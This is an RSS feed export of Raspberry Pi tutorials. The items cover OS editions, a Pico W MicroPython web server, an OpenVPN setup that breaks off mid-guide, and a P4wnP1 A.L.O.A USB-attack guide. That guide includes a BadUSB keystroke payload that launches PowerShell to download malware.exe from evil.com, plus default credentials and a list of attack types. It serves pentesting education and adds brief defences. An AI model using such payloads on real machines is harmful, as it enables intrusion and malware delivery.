<description>&lt;h3 class="c-software-os__heading"&gt;Raspberry Pi OS with desktop&lt;/h3&gt;&lt;div class="c-software-os__details"&gt;&lt;ul class="c-software-os__list"&gt;&lt;li class="c-software-os__item"&gt;Release date: November 19th 2024&lt;/li&gt;&lt;li class="c-software-os__item"&gt;System: 32-bit&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Kernel version: 6.6&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Debian version: 12 (bookworm)&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Size: 1,177&lt;abbr title="Megabytes"&gt;MB&lt;/abbr&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3 class="c-software-os__heading"&gt;Raspberry Pi OS with desktop and recommended software&lt;/h3&gt;&lt;div class="c-software-os__details"&gt;&lt;ul class="c-software-os__list"&gt;&lt;li class="c-software-os__item"&gt;Release date: November 19th 2024&lt;/li&gt;&lt;li class="c-software-os__item"&gt;System: 32-bit&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Kernel version: 6.6&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Debian version: 12 (bookworm)&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Size: 2,727&lt;abbr title="Megabytes"&gt;MB&lt;/abbr&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;p class="sc-rp-type-meta"&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a rel="nofollow" href="https://www.raspberrypi.com/software/operating-systems/"&gt;Read more&lt;/a&gt;&lt;/p&gt;</description>
<category>Raspberry Pi OS</category>
<guid isPermaLink="true">https://asky.uk/72/operating-system-images-raspberry-pi</guid>
<pubDate>Sun, 30 Mar 2025 21:02:56 +0000</pubDate>
</item>
<item>
<title>Raspberry Pi OS – Raspberry Pi</title>
<link>https://asky.uk/71/raspberry-pi-os-raspberry-pi</link>
<description>&lt;p&gt;&lt;strong&gt;Raspberry Pi OS – The Official Operating System for Raspberry Pi&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Raspberry Pi OS (formerly known as Raspbian) is the official operating system for Raspberry Pi devices. It is a lightweight, Debian-based Linux distribution specifically optimized for the hardware capabilities of Raspberry Pi boards. Whether used for education, home automation, robotics, or software development, Raspberry Pi OS provides a reliable and versatile platform for various projects.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;History and Development&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Raspberry Pi OS was first introduced in 2012 as Raspbian, a community-developed operating system built from the Debian Linux distribution. In 2020, the Raspberry Pi Foundation rebranded it as Raspberry Pi OS to emphasize its official support and continuous development for Raspberry Pi boards. The OS is regularly updated to ensure compatibility with new hardware and provide security improvements and performance enhancements.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Features of Raspberry Pi OS&lt;/strong&gt;&lt;/h3&gt;&lt;h4&gt;&lt;strong&gt;1. Lightweight and Optimized for Raspberry Pi&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Raspberry Pi OS is designed to run efficiently on Raspberry Pi devices, even on older models with limited RAM and processing power. It is optimized for ARM architecture, ensuring smooth performance while keeping resource usage minimal.&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;2. 
Multiple Versions Available&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Raspberry Pi OS comes in different editions to suit different user needs:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi OS Lite&lt;/strong&gt; – A minimal, command-line-based version for advanced users and server applications.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi OS with Desktop&lt;/strong&gt; – Includes a lightweight desktop environment (LXDE-based) for users who prefer a graphical interface.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi OS with Desktop and Recommended Software&lt;/strong&gt; – Comes with pre-installed applications such as LibreOffice, Chromium browser, and educational tools like Scratch and Python.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;&lt;strong&gt;3. Pre-installed Applications and Tools&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Raspberry Pi OS includes essential software out of the box, such as:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Python and Scratch&lt;/strong&gt; – Programming languages for beginners and advanced users.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Chromium Web Browser&lt;/strong&gt; – Optimized for web browsing on Raspberry Pi.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Thonny IDE&lt;/strong&gt; – A simple Python development environment for coding.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;VNC and SSH Support&lt;/strong&gt; – Enables remote access and control over the network.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;&lt;strong&gt;4. 
Regular Updates and Security Patches&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;The Raspberry Pi Foundation frequently updates Raspberry Pi OS to improve security, fix bugs, and enhance compatibility with the latest Raspberry Pi hardware.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Installation and Usage&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Installing Raspberry Pi OS is straightforward:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Download the official Raspberry Pi Imager from the Raspberry Pi website.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Insert a microSD card into your computer and flash the OS image using the Raspberry Pi Imager.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Insert the microSD card into the Raspberry Pi and power it on.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Raspberry Pi OS is the best choice for running a Raspberry Pi, offering stability, performance, and a user-friendly experience. Whether you are a beginner learning to code or an advanced user working on complex projects, Raspberry Pi OS provides a solid foundation for your Raspberry Pi applications.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a rel="nofollow" href="https://www.raspberrypi.com/software/"&gt;Read more&lt;/a&gt;&lt;/p&gt;</description>
<category>Raspberry Pi OS</category>
<guid isPermaLink="true">https://asky.uk/71/raspberry-pi-os-raspberry-pi</guid>
<pubDate>Sun, 30 Mar 2025 21:02:56 +0000</pubDate>
</item>
<item>
<title>Raspberry Pi Products Category on Adafruit Industries</title>
<link>https://asky.uk/70/raspberry-pi-products-category-on-adafruit-industries</link>
<description>&lt;p&gt;Raspberry Pi · 40 Pin GPIO Extension Cable for any 2x20 Pin Raspberry Pi - 150mm / 6" long · 8 Channel LoRa Gateway Kit with LoRa HAT and GPS for Pi 4 - Pi Not ...&lt;/p&gt;&lt;p&gt;&lt;a rel="nofollow" href="https://www.adafruit.com/category/105"&gt;Read more&lt;/a&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/70/raspberry-pi-products-category-on-adafruit-industries</guid>
<pubDate>Sun, 30 Mar 2025 20:59:55 +0000</pubDate>
</item>
<item>
<title>How to run a webserver on Raspberry Pi Pico W?</title>
<link>https://asky.uk/69/how-to-run-a-webserver-on-raspberry-pi-pico-w</link>
<description>Running a web server on the **Raspberry Pi Pico W** (which has Wi-Fi capability) is possible using **MicroPython** or **C/C++ (with the Pico SDK)**. Below, I&amp;#039;ll guide you through setting up a simple web server using **MicroPython** (the easiest method).&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Steps to Run a Web Server on Raspberry Pi Pico W**&lt;br /&gt;
&lt;br /&gt;
#### **1. Set Up MicroPython on Pico W**&lt;br /&gt;
- Download the latest **MicroPython firmware** for Pico W from: &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;[https://micropython.org/download/rp2-pico-w/](https://micropython.org/download/rp2-pico-w/)&lt;br /&gt;
- Flash it onto the Pico W by holding the **BOOTSEL** button while plugging it into USB, then drag the `.uf2` file to the `RPI-RP2` drive.&lt;br /&gt;
&lt;br /&gt;
#### **2. Connect to Wi-Fi**&lt;br /&gt;
Use the following script to connect your Pico W to Wi-Fi:&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
import network&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
# Configure Wi-Fi&lt;br /&gt;
ssid = &amp;quot;YOUR_WIFI_SSID&amp;quot;&lt;br /&gt;
password = &amp;quot;YOUR_WIFI_PASSWORD&amp;quot;&lt;br /&gt;
&lt;br /&gt;
wlan = network.WLAN(network.STA_IF)&lt;br /&gt;
wlan.active(True)&lt;br /&gt;
wlan.connect(ssid, password)&lt;br /&gt;
&lt;br /&gt;
# Wait for connection&lt;br /&gt;
max_wait = 10&lt;br /&gt;
while max_wait &amp;gt; 0:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if wlan.isconnected():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;max_wait -= 1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;time.sleep(1)&lt;br /&gt;
&lt;br /&gt;
if not wlan.isconnected():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;raise RuntimeError(&amp;quot;Network connection failed&amp;quot;)&lt;br /&gt;
else:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Connected to Wi-Fi&amp;quot;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;IP Address:&amp;quot;, wlan.ifconfig()[0])&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
#### **3. Create a Simple Web Server**&lt;br /&gt;
Here’s a basic HTTP server that responds with &amp;quot;Hello, Pico W!&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
import socket&lt;br /&gt;
&lt;br /&gt;
# HTML content to serve&lt;br /&gt;
html = &amp;quot;&amp;quot;&amp;quot;&amp;lt;!DOCTYPE html&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;title&amp;gt;Pico W Web Server&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;h1&amp;gt;Hello, Pico W!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# Set up socket&lt;br /&gt;
addr = socket.getaddrinfo(&amp;#039;0.0.0.0&amp;#039;, 80)[0][-1]&lt;br /&gt;
s = socket.socket()&lt;br /&gt;
s.bind(addr)&lt;br /&gt;
s.listen(1)&lt;br /&gt;
print(&amp;quot;Listening on&amp;quot;, addr)&lt;br /&gt;
&lt;br /&gt;
# Serve requests&lt;br /&gt;
while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;try:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn, addr = s.accept()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Client connected from&amp;quot;, addr)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;request = conn.recv(1024)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response = html&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn.send(&amp;quot;HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n&amp;quot;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn.send(response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn.close()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;except OSError as e:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Connection closed&amp;quot;)&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
#### **4. Run the Web Server**&lt;br /&gt;
- Save the script as `main.py` on your Pico W so it runs on boot.&lt;br /&gt;
- Reset the Pico W (or unplug/replug it).&lt;br /&gt;
- Open a browser and enter the **IP address** printed in the REPL.&lt;br /&gt;
&lt;br /&gt;
You should see the **&amp;quot;Hello, Pico W!&amp;quot;** page.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Enhancements (Optional)**&lt;br /&gt;
- **Handle multiple requests** (avoid crashing after one request).&lt;br /&gt;
- **Add routes** (e.g., `/`, `/led`).&lt;br /&gt;
- **Control GPIO pins** (toggle an LED via HTTP).&lt;br /&gt;
- **Use `microdot` (a lightweight MicroPython web framework)**:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```python&lt;br /&gt;
&amp;nbsp;&amp;nbsp;from microdot import Microdot&lt;br /&gt;
&amp;nbsp;&amp;nbsp;app = Microdot()&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;@app.route(&amp;#039;/&amp;#039;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;def index(request):&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return &amp;quot;Hello from MicroDot!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;app.run(port=80)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```&lt;br /&gt;
&amp;nbsp;&amp;nbsp;(Install `microdot` via `mip` or manually.)&lt;br /&gt;
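The "add routes" enhancement above can be sketched in plain Python for the raw-socket server as well; the paths and responses here are illustrative.

```python
# Hedged sketch of simple path routing for the raw-socket server.
# Paths and response bodies are illustrative.
def route(path):
    if path == '/':
        return 'Hello, Pico W!'
    if path == '/led':
        return 'LED control page'
    return '404 Not Found'

# Extract the path from an HTTP request line, dropping any query string
request_line = 'GET /led HTTP/1.1'
path = request_line.split(' ')[1].split('?')[0]
print(route(path))
```

On the Pico W, `request_line` would come from the first line of `conn.recv(1024)` instead of a literal.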
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Troubleshooting**&lt;br /&gt;
- **Can&amp;#039;t connect to Wi-Fi?** Check credentials and signal strength.&lt;br /&gt;
- **Port 80 not working?** Ensure no other device is using it.&lt;br /&gt;
- **Script crashes?** Wrap in `try-except` blocks.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
This is a basic example, but you can expand it to control sensors, LEDs, or serve dynamic content. Let me know if you need help with more advanced features! </description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/69/how-to-run-a-webserver-on-raspberry-pi-pico-w</guid>
<pubDate>Fri, 28 Mar 2025 23:47:45 +0000</pubDate>
</item>
<item>
<title>How to use Raspberry Pi Zero W P4wnP1 A.L.O.A?</title>
<link>https://asky.uk/68/how-to-use-raspberry-pi-zero-w-p4wnp1-a-l-o-a</link>
<description>The **Raspberry Pi Zero W** paired with **P4wnP1 A.L.O.A** (A Little Offensive Appliance) is a powerful combination for penetration testing, ethical hacking, and USB attack simulations. Below is an overview of what this setup can do and how to get started:&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **What is P4wnP1 A.L.O.A?**&lt;br /&gt;
P4wnP1 A.L.O.A is a firmware framework for the **Raspberry Pi Zero (W/WH)** that turns it into a **programmable USB attack tool**. It allows you to emulate keyboards, network interfaces, storage devices, and more, making it ideal for:&lt;br /&gt;
- **HID Attacks** (keystroke injection, BadUSB)&lt;br /&gt;
- **Network Pivoting** (Ethernet gadget, Wi-Fi impersonation)&lt;br /&gt;
- **Payload Delivery** (malicious scripts, exfiltration)&lt;br /&gt;
- **Covert Operations** (stealthy backdoors)&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Key Features of P4wnP1 A.L.O.A**&lt;br /&gt;
1. **USB HID Emulation** – Acts as a keyboard/mouse to execute scripts on a target machine.&lt;br /&gt;
2. **Ethernet over USB** – Provides network access through the Pi Zero.&lt;br /&gt;
3. **Mass Storage Emulation** – Pretends to be a USB drive for payload delivery.&lt;br /&gt;
4. **Bluetooth &amp;amp; Wi-Fi Attacks** – Can perform deauthentication, sniffing, etc.&lt;br /&gt;
5. **Web Interface &amp;amp; Remote Control** – Manage attacks via a browser.&lt;br /&gt;
6. **Scriptable Payloads** – Write custom attack scripts in JavaScript or Python.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Setting Up P4wnP1 A.L.O.A on Raspberry Pi Zero W**&lt;br /&gt;
#### **1. Download the Firmware**&lt;br /&gt;
- Get the latest **P4wnP1 A.L.O.A** image from: &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;[https://github.com/RoganDawes/P4wnP1_aloa](https://github.com/RoganDawes/P4wnP1_aloa)&lt;br /&gt;
&lt;br /&gt;
#### **2. Flash the Image**&lt;br /&gt;
- Use **Balena Etcher** or `dd` to flash the `.img` file to a microSD card.&lt;br /&gt;
&lt;br /&gt;
#### **3. Boot &amp;amp; Configure**&lt;br /&gt;
- Insert the microSD into the Pi Zero W and connect it via USB to a computer.&lt;br /&gt;
- By default, it should appear as a **USB Ethernet device**.&lt;br /&gt;
- Access the web interface at: &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;**`http://172.24.0.1:8000`** &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;(Default credentials: `admin:admin`)&lt;br /&gt;
&lt;br /&gt;
#### **4. Customize Payloads**&lt;br /&gt;
- Use the **web GUI** or SSH (`ssh pi@172.24.0.1`, default password: `toor`) to configure attacks.&lt;br /&gt;
- Preloaded scripts include:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;- **HID attacks** (e.g., reverse shell, password dumpers)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;- **Wi-Fi attacks** (e.g., Karma, Evil Twin)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;- **Persistence mechanisms**&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Example: BadUSB Attack (Keystroke Injection)**&lt;br /&gt;
1. **Connect** the Pi Zero W to a target PC (it will appear as a keyboard).&lt;br /&gt;
2. **Trigger** a payload (e.g., open CMD and download malware):&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;```js&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;delay(1000);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;press(&amp;quot;GUI r&amp;quot;);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;delay(500);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;type(&amp;quot;cmd.exe\n&amp;quot;);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;delay(1000);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;type(&amp;quot;powershell -c \&amp;quot;iwr http://evil.com/malware.exe -O malware.exe\&amp;quot;\n&amp;quot;);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;```&lt;br /&gt;
3. The target PC executes the commands automatically.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Defensive Considerations**&lt;br /&gt;
- **Monitor USB devices** on secure systems.&lt;br /&gt;
- **Disable AutoRun** in Windows (`gpedit.msc` → disable AutoPlay).&lt;br /&gt;
- **Use USB condoms** (data blockers) for charging ports.&lt;br /&gt;
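&lt;br /&gt;
As a minimal sketch of the first point, a defender can baseline the attached USB devices and flag anything new. The snippet below only demonstrates the comparison logic on two hypothetical `lsusb`-style snapshot strings; a real monitor would capture the snapshots by running `lsusb` (or by subscribing to udev events) on a schedule.&lt;br /&gt;

```bash
#!/usr/bin/env bash
# Sketch: flag USB devices present in a new snapshot but not in the baseline.
# The snapshot contents below are hypothetical lsusb-style lines; in practice
# they would come from running lsusb itself.
baseline="Bus 001 Device 002: ID 046d:c52b Logitech USB Receiver"
current="Bus 001 Device 002: ID 046d:c52b Logitech USB Receiver
Bus 001 Device 005: ID 1d6b:0104 Multifunction Composite Gadget"

# comm requires sorted input; -13 prints lines unique to the second file,
# i.e. the newly attached devices.
printf '%s\n' "$baseline" | sort -o baseline.txt
printf '%s\n' "$current"  | sort -o current.txt
new_devices=$(comm -13 baseline.txt current.txt)

if [ -n "$new_devices" ]; then
  echo "New USB device(s) detected:"
  echo "$new_devices"
fi
```

On hardened hosts the same idea is implemented more robustly by tools such as **USBGuard**, which can whitelist devices by vendor/product ID.&lt;br /&gt;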
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Conclusion**&lt;br /&gt;
The **Raspberry Pi Zero W + P4wnP1 A.L.O.A** is a compact yet powerful tool for security professionals. It can be used responsibly for penetration testing, red teaming, and learning about USB-based attacks.</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/68/how-to-use-raspberry-pi-zero-w-p4wnp1-a-l-o-a</guid>
<pubDate>Tue, 25 Mar 2025 21:13:06 +0000</pubDate>
</item>
<item>
<title>How to use a Raspberry Pi for VPN?</title>
<link>https://asky.uk/67/how-to-use-raspberry-pi-for-vpn</link>
<description>
# **Setting Up a VPN Server with a Raspberry Pi** &amp;nbsp;&lt;br /&gt;
Using a **Raspberry Pi** as a **VPN server** is a **cheap and effective** way to get: &amp;nbsp;&lt;br /&gt;
✅ **Encrypted internet traffic** &amp;nbsp;&lt;br /&gt;
✅ **Remote access to your home network** &amp;nbsp;&lt;br /&gt;
✅ **A way around geographic restrictions** &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
Below is a **step-by-step** guide to setting up **OpenVPN** or **WireGuard** (two popular VPN protocols). &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **Option 1: OpenVPN on a Raspberry Pi** &amp;nbsp;&lt;br /&gt;
OpenVPN is **reliable, open source**, and works with a wide range of devices. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Requirements** &amp;nbsp;&lt;br /&gt;
- Raspberry Pi (a **Raspberry Pi 4** is recommended for better throughput) &amp;nbsp;&lt;br /&gt;
- MicroSD card (**16GB+**) &amp;nbsp;&lt;br /&gt;
- **Raspberry Pi OS** installed &amp;nbsp;&lt;br /&gt;
- A stable internet connection &amp;nbsp;&lt;br /&gt;
- The ability to set up **port forwarding** on your router (if you want access from outside) &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### **Steps** &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **1. Update the system** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **2. Install OpenVPN &amp;amp; Easy-RSA** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo apt install openvpn easy-rsa -y&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **3. Set up the Certificate Authority (CA)** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
make-cadir ~/openvpn-ca&lt;br /&gt;
cd ~/openvpn-ca&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Edit the `vars` file: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
nano vars&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
(Set `KEY_COUNTRY`, `KEY_PROVINCE`, `KEY_CITY`, `KEY_ORG`, `KEY_EMAIL`, etc.) &amp;nbsp;&lt;br /&gt;
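&lt;br /&gt;
For example, the relevant `vars` lines might look like this (all values are placeholders — replace them with your own): &amp;nbsp;&lt;br /&gt;

```bash
# Easy-RSA 2 certificate defaults; placeholder values, use your own
export KEY_COUNTRY="UK"
export KEY_PROVINCE="London"
export KEY_CITY="London"
export KEY_ORG="Home"
export KEY_EMAIL="you@example.com"
export KEY_OU="Home"
```

These values are offered as the defaults whenever you generate a certificate, so at the prompts you only have to press Enter. &amp;nbsp;&lt;br /&gt;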
&lt;br /&gt;
#### **4. Generate certificates and keys** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
source vars&lt;br /&gt;
./clean-all&lt;br /&gt;
./build-ca &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Press Enter to accept the defaults&lt;br /&gt;
./build-key-server server &amp;nbsp;# Server name: &amp;quot;server&amp;quot;&lt;br /&gt;
./build-key client1 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Create a client certificate&lt;br /&gt;
./build-dh &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Generate Diffie-Hellman parameters&lt;br /&gt;
openvpn --genkey --secret keys/ta.key &amp;nbsp;# Extra TLS hardening&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **5. Configure the OpenVPN server** &amp;nbsp;&lt;br /&gt;
Copy the sample configuration file: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/&lt;br /&gt;
sudo gzip -d /etc/openvpn/server.conf.gz&lt;br /&gt;
sudo nano /etc/openvpn/server.conf&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
**Important settings:** &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
port 1194&lt;br /&gt;
proto udp&lt;br /&gt;
dev tun&lt;br /&gt;
ca /home/pi/openvpn-ca/keys/ca.crt&lt;br /&gt;
cert /home/pi/openvpn-ca/keys/server.crt&lt;br /&gt;
key /home/pi/openvpn-ca/keys/server.key&lt;br /&gt;
dh /home/pi/openvpn-ca/keys/dh2048.pem&lt;br /&gt;
server 10.8.0.0 255.255.255.0&lt;br /&gt;
push &amp;quot;redirect-gateway def1 bypass-dhcp&amp;quot; &amp;nbsp;# Route all client traffic through the VPN&lt;br /&gt;
push &amp;quot;dhcp-option DNS 8.8.8.8&amp;quot; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Use Google DNS&lt;br /&gt;
keepalive 10 120&lt;br /&gt;
tls-auth /home/pi/openvpn-ca/keys/ta.key 0&lt;br /&gt;
cipher AES-256-CBC&lt;br /&gt;
user nobody&lt;br /&gt;
group nogroup&lt;br /&gt;
persist-key&lt;br /&gt;
persist-tun&lt;br /&gt;
status openvpn-status.log&lt;br /&gt;
verb 3&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **6. Enable IP forwarding and NAT** &amp;nbsp;&lt;br /&gt;
Edit `/etc/sysctl.conf`: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo nano /etc/sysctl.conf&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Uncomment: &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Apply the change: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo sysctl -p&lt;br /&gt;
